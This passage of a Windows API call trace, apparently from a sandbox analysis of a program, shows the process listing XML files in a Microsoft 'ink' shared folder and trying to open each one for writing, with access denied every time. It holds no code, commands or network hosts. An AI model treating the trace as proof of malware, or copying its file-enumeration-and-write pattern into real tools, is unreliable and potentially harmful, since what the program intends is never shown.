dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.028] GetFileType (hFile=0x368) returned 0x1 [0100.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0100.028] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.028] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.028] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.028] CloseHandle (hObject=0x368) returned 1 [0100.029] AreFileApisANSI () returned 1 [0100.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ecf0 [0100.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml") returned 61 [0100.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.029] GetLastError () returned 0x5 [0100.029] GetLastError () returned 0x5 [0100.029] SetLastError (dwErrCode=0x5) [0100.029] GetLastError () returned 0x5 [0100.029] SetLastError (dwErrCode=0x5) [0100.029] GetLastError () returned 0x5 [0100.029] SetLastError (dwErrCode=0x5) [0100.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0100.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0100.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.029] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c96711d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipshrv.xml", cAlternateFileName="")) returned 1 [0100.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0100.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0100.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0100.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0100.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.030] AreFileApisANSI () returned 1 [0100.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml", lpUsedDefaultChar=0x0) returned 62 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.030] AreFileApisANSI () returned 1 [0100.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0100.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml") returned 62 [0100.031] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.031] GetFileType (hFile=0x368) returned 0x1 [0100.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.031] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.031] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.031] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.032] CloseHandle (hObject=0x368) returned 1 [0100.032] AreFileApisANSI () returned 1 [0100.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0100.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml") returned 62 [0100.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.032] GetLastError () returned 0x5 [0100.032] GetLastError () returned 0x5 [0100.032] SetLastError (dwErrCode=0x5) [0100.032] GetLastError () returned 0x5 [0100.032] SetLastError (dwErrCode=0x5) [0100.032] GetLastError () returned 0x5 [0100.032] SetLastError (dwErrCode=0x5) [0100.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.032] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.032] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.032] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d14d081, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d14d081, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa0a, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsid.xml", cAlternateFileName="")) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.033] AreFileApisANSI () returned 1 [0100.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml", lpUsedDefaultChar=0x0) returned 61 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0100.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0100.034] AreFileApisANSI () returned 1 [0100.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6dfa8 [0100.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml") returned 61 [0100.034] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.034] GetFileType (hFile=0x368) returned 0x1 [0100.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.034] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.034] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.034] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.035] CloseHandle (hObject=0x368) returned 1 [0100.035] AreFileApisANSI () returned 1 [0100.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e030 [0100.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml") returned 61 [0100.035] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.035] GetLastError () returned 0x5 [0100.035] GetLastError () returned 0x5 [0100.035] SetLastError (dwErrCode=0x5) [0100.035] GetLastError () returned 0x5 [0100.035] SetLastError (dwErrCode=0x5) [0100.035] GetLastError () returned 0x5 [0100.035] SetLastError (dwErrCode=0x5) [0100.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0100.035] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.035] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.035] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9de, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsita.xml", cAlternateFileName="")) returned 1 [0100.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0100.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.036] AreFileApisANSI () returned 1 [0100.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml", lpUsedDefaultChar=0x0) returned 62 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0100.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.037] AreFileApisANSI () returned 1 [0100.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ebe0 [0100.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml") returned 62 [0100.037] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.037] GetFileType (hFile=0x368) returned 0x1 [0100.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.037] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.037] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, 